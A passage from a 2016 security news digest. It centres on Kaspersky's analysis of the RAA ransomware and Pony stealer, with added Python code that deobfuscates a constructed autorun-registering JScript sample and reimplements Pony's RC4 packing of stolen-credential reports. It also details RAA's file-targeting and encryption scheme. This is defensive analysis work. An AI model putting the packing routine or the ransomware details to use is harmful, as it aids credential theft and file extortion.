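        a = {k.lower(): (v or "").lower() for k, v in attrs}
        if a.get("type") == "password":
            self.password_fields += 1
        elif a.get("autocomplete") in CARD_AUTOCOMPLETE:
            self.card_fields += 1


def chrome56_verdict(url, html, response_headers):
    """Describe what Chrome 56 would show for this page.

    response_headers: dict of HTTP response headers as received.
    """
    finder = SensitiveFieldFinder()
    finder.feed(html)
    scheme = urlsplit(url).scheme.lower()
    sensitive = finder.password_fields + finder.card_fields > 0
    hsts = any(k.lower() == "strict-transport-security" for k in response_headers)
    return {
        "scheme": scheme,
        "password_fields": finder.password_fields,
        "card_fields": finder.card_fields,
        # Chrome 56 labels http:// pages with password/card fields "Not secure"
        "not_secure_label": scheme == "http" and sensitive,
        # HSTS only counts on an HTTPS response; browsers ignore the header on
        # plain HTTP, so serving it there gives no protection
        "hsts_effective": scheme == "https" and hsts,
    }


# Constructed sample pages (hypothetical hosts, not real sites)
LOGIN_HTTP = ("http://shop.example/login",
              '<form><input name="u"><input type="password" name="p"></form>',
              {})
CHECKOUT_HTTPS = ("https://shop.example/checkout",
                  '<form><input autocomplete="cc-number">'
                  '<input autocomplete="cc-csc"></form>',
                  {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})
BLOG_HTTP = ("http://blog.example/post", "<p>hello</p>", {})


def audit(pages=(LOGIN_HTTP, CHECKOUT_HTTPS, BLOG_HTTP)):
    """Run the verdict over a list of (url, html, headers) triples."""
    return {url: chrome56_verdict(url, html, hdrs) for url, html, hdrs in pages}


if __name__ == "__main__":
    for url, v in audit().items():
        print(url, "-> NOT SECURE" if v["not_secure_label"] else "-> ok", v)
```

Only the login form over plain HTTP is flagged; the HTTPS checkout page is fine even though it collects card numbers, and the HTTP blog page has no sensitive fields, so it escapes this first phase of the rollout (later phases, as described above, will label it too).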

A malicious pairing of cryptor and stealer
9.9.2016 Kaspersky Virus
We have already seen some cryptor attacks where malicious programs with different functions have been used in combination. For example, one version of the Shade cryptor checks victim computers for signs of accounting activity; if it finds any, it doesn’t encrypt the files, but instead installs remote control tools in the infected system. The bot can then be used by cybercriminals to steal money, a much more profitable outcome than just receiving a ransom to decrypt some files.

The owners of the RAA cryptor, however, took a different tack. The Trojan is delivered in emails that mostly target corporate users. After a successful infection, RAA executes its main task, i.e. encrypts the user’s files. However, it doesn’t stop there: some versions of RAA also include a Pony Trojan file, which steals confidential information from the infected computer. Using the stolen data, the cybercriminals can gain access to the victim’s mail clients and other resources. We can assume that the owners of RAA use these resources to carry out targeted attacks – sending out emails with the cryptor malware to the addresses on the victim’s contact list. This substantially improves the probability of subsequent infections.

In this article, we will provide details of how a pair of malicious programs – a new version of the RAA cryptor and the Pony stealer Trojan – work in unison.

The RAA cryptor

The RAA cryptor (Kaspersky Lab verdict: Trojan-Ransom.JS.RaaCrypt) was first detected in June 2016. It caught the attention of researchers and analysts due to the fact that it was written entirely in JavaScript, which is a rarity when it comes to ransomware cryptor Trojans.

We recently detected a new version of this Trojan that has a few differences from earlier known modifications. Let’s have a closer look at this particular sample, which has been assigned the verdict Trojan-Ransom.JS.RaaCrypt.ag.


The body of this new version of RAA is a script in JScript (with a .js file extension). The malicious script is sent to potential victims attached to a spam message in a ZIP file with the password ‘111’.

The attack is aimed primarily at corporate users: the message mimics finance-related business correspondence, and the script’s name is similar to those shown below:

Счета на оплату _ август 2016 согласовано и отправлено контрагенту для проведения оплаты _aytOkOTH.doc.js (Invoice_August 2016 approved and sent to contractor for payment _aytOkOTH.doc.js)

Счета на оплату _ август 2016 согласовано и отправлено контрагенту для проведения оплаты _EKWT.doc.js (Invoice_August 2016 approved and sent to contractor for payment _ EKWT.doc.js)


“Let’s presume we made a concession when we allowed you to postpone your due payment.

“We understand you may have difficulties, but do we have to wait for another two months? To be honest, we don’t really want to go to court. Please make all the payments in next few days.”

The message includes a notice saying:

“The company… notifies you that in line with internal security regulations, all outgoing emails are subject to asymmetric encryption. Dear client, your password for this message is 111.”

People who know what ‘asymmetric encryption’ is will probably just smile at this; however, the message is obviously targeting a different audience.

It should be noted that sending malicious content in a password-protected archive is a well-known trick used by cybercriminals to prevent anti-malware systems installed on mail servers from unpacking the archive and detecting any malicious content. To unpack an archive like this, the anti-malware product must automatically retrieve the password from the message, which isn’t always possible.

For an infection to occur, users have to unpack the archive themselves and launch the .js file.

Script obfuscation

The code of the malicious script was deliberately obfuscated to complicate things for malware analysts. The content of the script looks like this in the source code:


Fragment of the obfuscated code

If we restore the line breaks and indents, it becomes obvious that the obfuscation involves renamed variables and functions, as well as strings hidden in the global array. After de-obfuscation and function renaming, the same section of code becomes much easier to read.


Fragment of de-obfuscated code

The script is nearly 3,000 lines long. Most of this is taken up by an implementation of the legitimate CryptoJS library and an implementation of the RSA encryption procedure, which the cybercriminals also took from public sources.
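The array-lookup pattern described above is common enough that it is worth automating. The following Python script is an added example written for this page (not Kaspersky's tooling, and the JScript snippet it processes is constructed to mimic the pattern rather than taken from the RAA sample): it locates the global string array, decodes the JS escape sequences hiding the literals, replaces each name[index] reference with the literal, and turns obj["prop"] back into obj.prop. Rotated arrays, string-concatenation tricks and other obfuscator features are out of scope.

```python
"""Undo the "strings hidden in a global array" obfuscation described above.
Added example written for this page, not Kaspersky's tooling; the JScript
sample below is constructed to mimic the pattern, not taken from RAA."""
import json
import re

# var NAME = [ ... ];   (first string array declared in the script)
ARRAY_DECL = re.compile(r'var\s+([A-Za-z_$][\w$]*)\s*=\s*\[(.*?)\]\s*;', re.S)
# a double- or single-quoted JS string literal, escapes allowed inside
STRING_LIT = re.compile(r'"((?:\\.|[^"\\])*)"|\'((?:\\.|[^\'\\])*)\'', re.S)
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "0": "\0"}


def js_unescape(body):
    """Decode \\xNN, \\uNNNN, \\n ... inside a JS string literal body."""
    def repl(m):
        e = m.group(1)
        if e[0] in "xu":
            return chr(int(e[1:], 16))
        return _SIMPLE.get(e, e)   # \\ \" \' and unknown escapes map to themselves
    return re.sub(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)', repl, body, flags=re.S)


def extract_string_array(script):
    """Return (array_name, [decoded strings], (start, end)) or None."""
    m = ARRAY_DECL.search(script)
    if not m:
        return None
    strings = []
    for sm in STRING_LIT.finditer(m.group(2)):
        raw = sm.group(1) if sm.group(1) is not None else sm.group(2)
        strings.append(js_unescape(raw))
    return m.group(1), strings, m.span()


def deobfuscate(script):
    """Inline the array strings and restore dotted property access."""
    found = extract_string_array(script)
    if found is None:
        return script
    name, strings, (start, end) = found
    body = script[:start] + script[end:]            # drop the array declaration
    ref = re.compile(re.escape(name) + r'\[(\d+)\]')

    def sub_ref(m):
        idx = int(m.group(1))
        if idx >= len(strings):
            return m.group(0)                       # out of range: leave untouched
        return json.dumps(strings[idx])             # re-quote as a clean literal

    body = ref.sub(sub_ref, body)
    # obj["RegWrite"] -> obj.RegWrite, only when the literal is a valid identifier
    body = re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', body)
    return body.strip()


# Constructed sample in the style of the obfuscated script (not the real RAA code)
SAMPLE = r'''var _0x3b1c=["WScript.Shell","\x53oftware\\Microsoft\\Windows\\CurrentVersion\\Run","RegWrite","REG_SZ"];
function _0x1a(_0x2b){var _0x3c=new ActiveXObject(_0x3b1c[0]);_0x3c[_0x3b1c[2]](_0x3b1c[1]+"\\Updater",_0x2b,_0x3b1c[3]);}'''

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

After substitution the autorun registration that the array lookups were hiding is readable at a glance: an ActiveXObject("WScript.Shell") and a RegWrite into the Run key, which is exactly the sort of string an analyst greps a sample for.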

How the Trojan works

To lull the victim into a false sense of security, the RAA cryptor demonstrates a fake Microsoft Word document immediately after it launches. This document is in fact an RTF file specially crafted by the cybercriminals. (The document is contained in the Trojan’s body encoded in Base64 format.)


The fake document displayed to the victim

While the user is reading the message about a document that’s supposedly not being displayed properly, the Trojan is doing its dirty work:

Registers itself to be autostarted with Windows;
Deletes the registry key associated with the VSS service (to prevent files being restored from shadow copies);
Sends a request to the C&C server (unlike all previous versions of this Trojan, this version doesn’t wait for the delivery of keys from the server – the request is only sent so the cybercriminals can collect statistics);
Proceeds to search for files and encrypts them.
Key generation

Unlike earlier RAA modifications, this version of the cryptor does not request an encryption key from the C&C. Instead, the Trojan generates a session key on the client. To do so, it calls the WinAPI function RtlGenRandom, which is considered a cryptographically secure pseudorandom number generator.

To ensure it can call WinAPI functions from JS code, the Trojan uses a legitimate third-party OCX component called DynamicWrapperX. The Trojan stores it in its body in a Base64-encoded format, and installs it in the infected system. RAA has both 32-bit and 64-bit versions of DynamicWrapperX so it can attack systems running under both Windows architectures.

The Trojan encrypts the generated session key with an RSA algorithm (the public RSA-2048 key is contained within the script) and saves it to a file with the name “KEY-…”, where the multiple periods stand for a unique 36-character infection ID.

File encryption

RAA searches for and encrypts files with the extensions .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar, .csv whose names do not contain the substrings “.locked”, “~”, “$”.

When searching for files, the Trojan skips folders named “WINDOWS”, “RECYCLER”, “Program Files”, “Program Files (x86)”, “Windows”, “Recycle.Bin”, “RECYCLE.BIN”, “Recycler”, “TEMP”, “APPDATA”, “AppData”, “Temp”, “ProgramData”, and “Microsoft”.

When processing each file, RAA uses the session key to generate a file key and initialization vector (IV). The contents of the files are encrypted in different ways depending on the file size:

0 to 6,122 bytes: the file is encrypted in full.
6,123 to 4,999,999 bytes: three fragments in different sections of the file are selected for encryption. The first fragment, 2,000 to 2,040 bytes long, is taken from the beginning of the file; the location and size of the other two depend on the size of the first fragment and the overall size of the file.
5,000,001 to 500,000,000 bytes: two fragments of 90,000 to 125,000 bytes are selected for encryption (from the beginning and the end of the file).
500,000,001 bytes and larger: not encrypted.
A string is added at the end of the encrypted file that contains “IDNUM” (infection ID), “KEY_LOGIC” (indexes to construct the file key from the session key), “IV_LOGIC” (indexes to construct the IV from the session key), and “LOGIC_ID” (possible values are “1”, “2” or “3” – the selected encryption method depending on the file size). The encrypted file is given the additional extension .locked.


The string added to the end of the encrypted file

Ransom demand

When the files are encrypted, RAA displays a file with the cybercriminals’ demands and contacts in WordPad. The Trojan fills the text template with a 36-character ID which is unique for each case.


The file containing the cybercriminals’ demands

The cybercriminals suggest that the victims purchase a file decryption key and software from them. Two methods of communication are available: email and the Bitmessage service. The victim is expected to pay for the decryption key in bitcoins.

Plus a stealer Trojan

The damage caused by the Trojan is not limited to encrypting files. Like some of the earlier versions of RAA, the version we are examining has some added features. The Trojan contains an executable file encoded in Base64, which it writes to the hard drive at ‘C:\Users\<username>\Documents\ii.exe’ and launches after it has finished encrypting files. Analysis revealed that ‘ii.exe’ is none other than Pony, a known password-stealing Trojan (detection verdict: Trojan-PSW.Win32.Tepfer.gen).

Pony has proved to be an unusually long-lived Trojan. Its early versions supposedly emerged back in 2011, while in December 2013, as reported by the mass media, it stole the credentials of over 2 million users.

Naturally, after all that time Pony’s source code appeared on the web at some point. Analysis showed that the executable file we are analyzing here was constructed using Pony source code.

Pony: confidential data theft

To recap, Pony’s main task is to collect confidential information from an infected computer and then send it to the cybercriminals.

Step 1. Stealing information

Below is a short list of the information that Pony hunts for.

Passwords stored in web browsers: Microsoft Internet Explorer, Google Chrome, Opera, Mozilla Firefox, K-Meleon, Yandex.Browser

Credentials from dozens of the most popular FTP clients: CuteFTP 6/7/8/9/Pro/Lite, FTP Navigator, FlashFXP 3/4, FileZilla, FTP Commander, Bullet Proof FTP Client, COREFTP, FTP Explorer, ClassicFTP, FTPVoyager, LeechFTP, WinFTP, FTPGetter, ALFTP, BlazeFtp, Robo-FTP 3.7, NovaFTP, FTP Surfer, LinasFTP, Cyberduck, WiseFTP

Accounts from the most widespread mail clients: Microsoft Outlook, Mozilla Thunderbird, The Bat!, Windows Live Mail, Becky! Internet Mail, Pocomail

Various cryptocurrency wallet files: PPCoin, Primecoin, Feathercoin, ProtoShares, Quarkcoin, Worldcoin, Infinitecoin, Fastcoin, Phoenixcoin
The Trojan also has the following capabilities:

Pony steals the user’s digital certificates.
Pony carries a list of the most common combinations that users pick as passwords and uses it to try to gain access to accounts on the infected computer.
Step 2. Data encryption and sending

Before sending the collected information to the cybercriminals, Pony encrypts it with the RC4 algorithm. In the process, the Trojan records checksums of the data (a slightly modified CRC32 is used). The sequence is as follows:

Calculate the checksum of the non-encrypted data.
Write the obtained value next to the input data.
Encrypt input data with the RC4 algorithm using the key that the cybercriminals specified when they compiled the Trojan.
Calculate the checksum of the encrypted data.
Write the obtained value next to the input data.
Generate a random 4-byte key
Encrypt the input data with the RC4 algorithm using the generated key.
Generate a data package ready for sending, which can be described with the ToSend structure below.

struct ToSend {
    dword random_key;             // 4-byte key generated in step 6, sent in the clear
    byte* double_encrypted_data;  // output of step 7 (RC4 over RC4)
};

A non-encrypted fragment of the generated report


Fragment of the report that is ready for sending. The encryption key is highlighted in red

Once the data is in this form, Pony sends it to the cybercriminals.
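The packaging sequence above, as an added example (not Pony's code): a Python implementation of the two RC4 layers with their checksums, plus the unpacking routine an analyst would use on a captured report. Assumptions made here and marked in the code: a standard zlib CRC32 stands in for Pony's slightly modified variant, each 4-byte checksum is little-endian and appended after the data it covers, and the build key and report contents are invented.

```python
"""Pony-style report packaging: RC4(build key) + CRC, then RC4(random key) + CRC.
Added example for this page, not Pony's source. Assumptions: standard zlib CRC32
(Pony uses a slightly modified CRC32), little-endian checksums appended after
the data they cover, invented build key and report text."""
import os
import zlib


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); same function encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                             # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def checksum(data):
    """4-byte little-endian CRC32 (assumption: stand-in for Pony's variant)."""
    return zlib.crc32(data).to_bytes(4, "little")


def pack_report(plaintext, build_key, random_key=None):
    """Steps 1-8 from the text; returns the ToSend blob: random_key || data."""
    inner = plaintext + checksum(plaintext)            # steps 1-2
    enc1 = rc4(build_key, inner)                       # step 3: compiled-in key
    outer = enc1 + checksum(enc1)                      # steps 4-5
    random_key = random_key or os.urandom(4)           # step 6
    enc2 = rc4(random_key, outer)                      # step 7
    return random_key + enc2                           # step 8: struct ToSend


def unpack_report(blob, build_key):
    """Reverse the packaging; raises ValueError on a checksum mismatch."""
    if len(blob) < 4 + 4 + 4:
        raise ValueError("blob too short for a ToSend record")
    random_key, enc2 = blob[:4], blob[4:]
    outer = rc4(random_key, enc2)                      # undo step 7
    enc1, crc_outer = outer[:-4], outer[-4:]
    if checksum(enc1) != crc_outer:                    # verify step 4
        raise ValueError("outer checksum mismatch (corrupted capture?)")
    inner = rc4(build_key, enc1)                       # undo step 3
    plaintext, crc_inner = inner[:-4], inner[-4:]
    if checksum(plaintext) != crc_inner:               # verify step 1
        raise ValueError("inner checksum mismatch (wrong build key?)")
    return plaintext


# Constructed values: a hypothetical build key and a fake stolen-credential report
BUILD_KEY = b"example-build-key"
SAMPLE_REPORT = (b"ftp://ftp.example.net user:hunter2\r\n"
                 b"imap://mail.example.net analyst@example.net:P@ssw0rd\r\n")

if __name__ == "__main__":
    blob = pack_report(SAMPLE_REPORT, BUILD_KEY)
    print("random_key:", blob[:4].hex(), "payload bytes:", len(blob) - 4)
    print(unpack_report(blob, BUILD_KEY).decode())
```

The outer key travels in the clear in the random_key field, so that layer only obscures the traffic; the real secret is the build key compiled into the sample. Once that key has been pulled from an unpacked binary, the same unpack_report routine decrypts every report that build ever sent, which is how captured exfiltration gets reconstructed during an incident.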

Two alleged members of Crackas With Attitude group arrested for hacking US Gov Officials
9.9.2016 securityaffairs Hacking

U.S. authorities have arrested two alleged members of the Crackas With Attitude group involved in dumping details of officials with the FBI and the DHS.
The FBI has identified and arrested two North Carolina men suspected of being members of the notorious 'Crackas With Attitude' hacker group, which dumped details of government agents last year.

The hackers leaked the personal details of around 31,000 government employees: nearly 20,000 FBI agents, 9,000 Department of Homeland Security (DHS) officers and a number of DoJ staffers.


Crackas With Attitude made headlines for breaking into the personal accounts of senior officials at the CIA, FBI, the White House, the Homeland Security Department, and other US federal agencies.

In October 2015 the group broke into the CIA Director's personal email account and leaked sensitive files, including a top-secret application for a security clearance.

In January 2016, a hacker associated with the Crackas With Attitude group accessed accounts belonging to the Director of National Intelligence, James Clapper. The group also broke into the AOL email of FBI Deputy Director Mark Giuliano.

The two suspects arrested by the authorities are Andrew Otto Boggs (22), of North Wilkesboro, N.C., who went online with the handle “INCURSIO,” and Justin Gray Liverman (24), of Morehead City, who used the handle “D3F4ULT.”

According to a press release by Department of Justice, the two men were arrested on Thursday morning on charges of computer hacking.

“Andrew Otto Boggs, aka “INCURSIO,” 22, of North Wilkesboro, North Carolina, and Justin Gray Liverman, aka “D3F4ULT,” 24, of Morehead City, North Carolina, were arrested today on charges related to their alleged roles in the computer hacking of several senior U.S. government officials and U.S. government computer systems.” reads the press release.

“According to charging documents filed with the court, Boggs and Liverman conspired with members of a hacking group that called itself “Crackas With Attitude.” From about October 2015 to February 2016, the group used “social engineering” hacking techniques, including victim impersonation, to gain unlawful access to the personal online accounts of senior U.S. government officials, their families, and several U.S. government computer systems. “


In February, British police and the FBI arrested a 16-year-old British teenager suspected of being a member of the dreaded group.

“In some instances, members of the conspiracy uploaded private information that they obtained from victims’ personal accounts to public websites; made harassing phone calls to victims and their families; and defaced victims’ social media accounts,” reads the press release.

According to FBI officials, between October 2015 and February 2016 the hacking group used social engineering to trick the victims into revealing their account numbers, passwords, and other details.

The two men will have their initial appearances at the federal courthouse in Alexandria next week in front of U.S. Magistrate Judge Theresa Carroll Buchanan.

Over 33 million QIP.ru accounts compromised in an old data breach

9.9.2016 securityaffairs Hacking

Another old and huge data breach was reported to LeakedSource, more than 33 million QIP records from 2011 have been compromised.
Once again we are here to discuss a data breach; this time the victim is the Russian instant messaging service Quiet Internet Pager (QIP.ru). According to the breach notification service LeakedSource, the leaked dump includes details of more than 33 million users, and the data breach dates back to June 2011.


LeakedSource (@LeakedSource), 9 September 2016: "Another old mega breach added: 33 million QIP.ru records from 2011. Search yourself on #LeakedSource at https://www.leakedsource.com/"
Records belonging to 33,383,392 Quiet Internet Pager (QIP) users were disclosed by the same hacker who recently leaked tens of millions of accounts stolen from several popular services, including the Russian web portal Rambler, Mail.ru, Last.fm, Dota, LinkedIn, Myspace, and VerticalScope.

Security experts from HEROIC who analyzed the leaked data confirmed that the records include email addresses, usernames, and passwords in plain text.

The experts believe the archive dates back to 2009-2011. A close look at the compromised accounts reveals that one in three is associated with a Mail.Ru email address, followed by Yandex (2.5 million), Rambler (2 million) and Gmail (925,000).

As in so many other breaches, the top passwords are 123456, 123123, 111111 and 123456789.

FBI Arrests Two Hackers Who Hacked US Spy Chief, FBI and CIA Director
9.9.2016 thehackernews Hacking
US authorities have arrested two North Carolina men on charges that they were part of the notorious hacking group "Crackas With Attitude."
Crackas with Attitude is the group of hackers who allegedly was behind a series of audacious and embarrassing hacks that targeted personal email accounts of senior officials at the CIA, FBI, the White House, Homeland Security Department, and other US federal agencies.
Andrew Otto Boggs, 22, of North Wilkesboro, N.C., who allegedly used the handle "INCURSIO," and Justin Gray Liverman, 24, of Morehead City, known online as "D3F4ULT," were arrested on Thursday morning on charges related to their alleged roles in the computer hacking, according to a press release by the Department of Justice.
A 16-year-old British teenager suspected of being part of the group was arrested in February by the FBI and British police.
Although court documents did not name the victims, the hacking group had allegedly:
Hacked into the AOL email of CIA director John Brennan and released personal details.
Hacked into the personal emails and phone accounts of the US spy chief James Clapper.
Broke into the AOL email of the FBI Deputy Director Mark Giuliano.
The group also leaked the personal details of around 31,000 government employees: nearly 20,000 FBI agents, 9,000 Department of Homeland Security (DHS) officers and a number of DoJ staffers.
"In some instances, members of the conspiracy uploaded private information that they obtained from victims’ personal accounts to public websites; made harassing phone calls to victims and their families; and defaced victims’ social media accounts," reads the press release.
According to FBI officials, between October 2015 and February 2016 the hacking group used social engineering to trick the victims into revealing their account numbers, passwords, and other details.
Boggs and Liverman will be transferred next week to the Eastern District of Virginia, where federal prosecutors have spent months building a case against Crackas With Attitude.

Banking Trojan, Gugi, evolves to bypass Android 6 protection
9.9.2016 Kaspersky Android
Almost every Android OS update includes new security features designed to make cybercriminals’ life harder. And, of course, the cybercriminals always try to bypass them.

We have found a new modification of the mobile banking Trojan, Trojan-Banker.AndroidOS.Gugi.c that can bypass two new security features added in Android 6: permission-based app overlays and a dynamic permission requirement for dangerous in-app activities such as SMS or calls. The modification does not use any vulnerabilities, just social engineering.

Initial infection

The Gugi Trojan is spread mainly by SMS spam that takes users to phishing webpages with the text “Dear user, you receive MMS-photo! You can look at it by clicking on the following link”.


Clicking on the link initiates the download of the Gugi Trojan onto the user’s Android device.

Circumventing the security features

To help protect users from the impact of phishing and ransomware attacks, Android 6 introduced a requirement for apps to request permission to superimpose their windows/views over other apps. In earlier versions of the OS they were able to automatically overlay other apps.

The Trojan’s ultimate goal is to overlay banking apps with phishing windows in order to steal user credentials for mobile banking. It also overlays the Google Play Store app to steal credit card details.

The Trojan-Banker.AndroidOS.Gugi.c modification gets the overlay permission it needs by forcing users to grant this permission. It then uses that to block the screen while demanding ever more dangerous access.

The first thing an infected user is presented with is a window with the text “Additional rights needed to work with graphics and windows” and one button: “provide.”


After clicking on this button, the user will see a dialog box that authorizes the app overlay (“drawing over other apps”).


System request to permit Trojan-Banker.AndroidOS.Gugi.c to overlay other apps

But as soon as the user gives Gugi this permission, the Trojan will block the device and show its window over any other windows/dialogs.


Trojan-Banker.AndroidOS.Gugi.c window that blocks the infected device until it receives all the necessary rights

It gives the user no option, presenting a window that contains only one button: “Activate”. Once the user presses this button they will receive a continuous series of requests for all the rights the Trojan is looking for. They won’t get back to the main menu until they have agreed to everything.

For example, following the first click of the button, the Trojan will ask for Device Administrator rights. It needs this for self-defense because it makes it much harder for the user to uninstall the app.


After successfully becoming the Device Administrator, the Trojan produces the next request. This one asks the user for permission to send and view SMS and to make calls.

Interestingly, Android 6 introduced dynamic permission requests as a new security feature.

Earlier versions of the OS only showed app permissions at installation; starting from Android 6, the system asks users for permission to execute dangerous actions such as sending SMS or making calls the first time they are attempted, and also allows apps to ask at any other time – which is what the modified Gugi Trojan does.


System request for dynamic permission

The Trojan will continue to ask the user for each permission until they agree. Should the user deny permission, subsequent requests will offer them the option of closing the request. If the Trojan does not receive all the permissions it wants, it will completely block the infected device. In such a case the user’s only option is to reboot the device in safe mode and try to uninstall the Trojan.


Repeating system request for dynamic permission

A standard banking Trojan

With the exception of its ability to bypass Android 6 security features, and its use of the Websocket protocol, Gugi is a typical banking Trojan. It overlays apps with phishing windows to steal credentials for mobile banking or credit card details. It also steals SMS, contacts, makes USSD requests and can send SMS by command from the CnC.

The Trojan-Banker.AndroidOS.Gugi family has been known about since December 2015, with the modification Trojan-Banker.AndroidOS.Gugi.c first discovered in June 2016.

Victim profile

The Gugi Trojan mainly attacks users in Russia: more than 93% of attacked users to date are based in that country. Right now it is a trending Trojan – in the first half of August 2016 there were ten times as many victims as in April 2016.


Unique number of users attacked by Trojan-Banker.AndroidOS.Gugi

We will shortly be publishing a detailed report into the Trojan-Banker.AndroidOS.Gugi malware family, its functionality and its use of the Websocket protocol.

All Kaspersky Lab products detect all modifications of the Trojan-Banker.AndroidOS.Gugi malware family.

Warning! This Cross-Platform Malware Can Hack Windows, Linux and OS X Computers
8.9.2016 thehackernews Virus
Rather than crafting malware specifically for the Windows platform, cyber attackers have started creating cross-platform malware for wider exploitation.
Due to the rise in popularity of Mac OS X and other Windows desktop alternatives, hackers have begun designing cross-platform malware modularly for wide distribution.
Cross-platform malware is loaded with specialized payloads and components, allowing it to run on multiple platforms.
One such malware family, which runs on all the key operating systems, including Windows, Linux and Mac OS X, has recently been discovered by researchers at Kaspersky Lab.
Stefan Ortloff, a researcher from Kaspersky Lab’s Global Research and Analysis Team, first discovered the Linux and Windows variants of this family of cross-platform backdoor, dubbed Mokes, in January this year.
Now, the researcher today confirmed the existence of an OS X variant of this malware family, explaining a technical breakdown of the backdoor in a post on Securelist.
Like the Linux and Windows variants, the OS X backdoor variant, Backdoor.OSX.Mokes.a, specializes in capturing audio and video, logging keystrokes and taking screenshots every 30 seconds from a victim's machine.
The variant is written in C++ using Qt, a cross-platform application framework widely used for developing applications that run on various software and hardware platforms.
The backdoor also has the capability to monitor removable storage, such as when a USB drive is connected to or removed from the computer.
It can also scan the file system for Office documents, including .docx, .doc, .xlsx, and .xls files.
The OS X backdoor can also execute arbitrary commands on the victim’s computer from its command and control (C&C) server.
The backdoor establishes an encrypted connection with its command and control server and communicates using AES-256 encryption, which is considered to be a secure encryption algorithm.
Ortloff notes, right after execution, the OS X sample he analyzed copies itself to a handful of locations, including caches that belong to Skype, Dropbox, Google, and Firefox. This behavior is similar to the Linux variant that copied itself to locations belonging to Dropbox and Firefox after execution.
The researcher has not attributed the Mokes backdoor family to any hacking group, state-sponsored actor or country, nor has he given details about the OS X backdoor's infection vector or how widespread it is.
However, based on the currently available information, the backdoor seems to be a sophisticated piece of malware.

Cross-platform Mokes backdoor OS X exists and is spreading in the wild
8.9.2016 securityaffairs Vulnerebility

Malware researchers from Kaspersky Lab confirmed the existence of an OS X variant of the Mokes backdoor discovered in January by Kaspersky.
Malware researchers from Kaspersky Lab confirmed the existence of an OS X variant of a recently discovered family of cross-platform backdoors. The backdoors family was named Mokes and a strain of malware was first spotted in January, but its existence was confirmed only this week.

“Back in January this year we found a new family of cross-platform backdoors for desktop environments. After the discovery of the binaries for Linux and Windows systems, we have now finally come across the OS X version of Mokes.A. It is written in C++ using Qt, a cross-platform application framework, and is statically linked to OpenSSL. This leads to a filesize of approx.” wrote Kaspersky.

The malicious code is able to steal various kinds of data from an infected system, including screenshots, Office-Documents (docx, .doc, .xlsx, and .xls files), Keystrokes, and Audio-/Video-Captures.

The Mokes backdoor also allows hackers to execute arbitrary commands on the victim’s computer, it works on Linux, Windows and also OS X.

The OS X Mokes sample recently analyzed by Kaspersky was unpacked, but the researchers believe it is packed in the wild, like the Linux variant spotted in January.

Once executed, the Mokes backdoor copies itself to a handful of locations, choosing the first available in the following locations:

$HOME/Library/App Store/storeuserd
After the malware establishes a first connection with its C&C server using HTTP on TCP port 80, the backdoor communicates via TCP port 443.

The researchers discovered that the User-Agent string is hardcoded in the binary; once the server receives the request, it replies with “text/html” content 208 bytes in length. The encrypted connection is then established using the AES-256-CBC algorithm.


The strange thing about this story is that although the researchers spotted the first samples of the backdoor in January, the number of infections and samples observed did not increase.

Stefan Ortloff, the researcher with Kaspersky Lab’s Global Research and Analysis Team who identified the Mokes backdoor family, has not provided details on the infection vector.

The report published by Kaspersky also includes the IoC for the detection of the backdoor.

Here’s How to Hack Windows/Mac OS X Login Password (When Locked)
7.9.2016 thehackernews Hacking
A security researcher has discovered a unique attack method that can be used to steal credentials from a locked (but logged-in) computer and works on both Windows and Mac OS X systems.
In his blog post published today, security expert Rob Fuller demonstrated and explained how to exploit a USB SoC-based device to turn it into a credential-sniffer that works even on a locked computer or laptop.
Fuller modified the firmware of a USB Ethernet adapter in such a way that, when it is plugged in, the plug-and-play USB device installs itself and acts as the network gateway, DNS server and Web Proxy Auto-Discovery Protocol (WPAD) server for the victim's machine.
The attack is possible because most PCs automatically install Plug-and-Play USB devices, meaning "even if a system is locked out, the device [dongle] still gets installed," Fuller explains in his blog post.
"Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list."
How does the Attack Work?
You might be wondering: why does your computer automatically share Windows credentials with any connected device?
That is because of the default behavior of Microsoft Windows' name resolution services, which can be abused to steal authentication credentials.
The modified plug-and-play USB Ethernet adapter runs a piece of software, Responder, which spoofs the network to intercept hashed credentials and then stores them in an SQLite database.
The hashed credentials collected by the tool can later be easily brute-forced to recover clear-text passwords.
Apparently, to conduct this attack, attackers would require physical access to a target computer, so that they can plug in the evil USB Ethernet adapter. However, Fuller says the average time required for a successful attack is just 13 seconds.
You can watch the video demonstration below that shows Fuller's attack in action.

Fuller successfully tested his attack against Windows 98 SE, Windows 2000 SP4, Windows XP SP3, Windows 7 SP1, Windows 10 Enterprise and Home (but not Windows 8), as well as OS X El Capitan and OS X Mavericks. He’s also planning to test it against several Linux distros.
Fuller tested the attack with two USB Ethernet dongles: the USB Armory and the Hak5 Turtle. For more detailed explanation, you can head on to his blog post.

CVE-2016-3862 flaw – Silently hack millions Androids devices with a photo
7.9.2016 securityaffairs Vulnerebility

The CVE-2016-3862 flaw is a remote code execution vulnerability that affects the way images used by certain Android apps parsed the Exif data.
Are you an Android user? I have bad news for you: an apparently harmless image on a social media or messaging app could compromise your mobile device.
The latest security updates issued by Google fix the Quadrooter vulnerabilities, which threatened more than 900 million devices, and a critical zero-day that could let attackers deliver their hack hidden inside an image.

The flaw, coded as CVE-2016-3862, is a remote code execution vulnerability in the Mediaserver. It affects the way images used by certain Android applications parsed the Exif data included in the images.

“Exchangeable image file format (officially Exif, according to JEIDA/JEITA/CIPA specifications) is a standard that specifies the formats for images, sound, and ancillary tags used by digital cameras (including smartphones), scanners and other systems handling image and sound files recorded by digital cameras.” reads Wikipedia.

The flaw was first discovered by the security researcher Tim Strazzere from the SentinelOne firm, who explained that it could be exploited by hackers to take complete control of the device without the victim knowing or crash it.

